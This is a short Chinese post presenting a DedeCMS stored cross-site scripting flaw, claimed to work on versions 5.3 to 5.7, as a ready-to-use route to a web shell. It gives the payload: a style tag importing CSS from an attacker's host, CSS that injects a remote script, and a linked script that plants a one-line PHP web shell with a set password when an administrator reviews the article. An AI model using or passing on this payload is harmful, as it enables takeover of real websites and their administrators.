dedecms xss 0day通杀所有版本 可getshell

漏洞原因：
 
DEDECMS由于编辑器过滤不严，将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢？能getshell的都算0Day（鸡肋发挥起来也能变凤凰）目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个：开启注册开启投稿注册会员-发表文章投稿，
 
<style>@im\port'\http://xxx.com/xss.css';</style>
在你自己的网站xxx.com上新建xss.css内容如下：
 
 
body{background-image:url('javascript:document.write("<scriptsrc=http://xxx.com/xss.js></script>")') }
在你自己的网站xxx.com上新建xss.js 内容如下：http://pan.baidu.com/s/1eQIa6jC
 

当管理员审核这篇文章的时候，将自动在data目录生成一句话xxx.php。密码xxx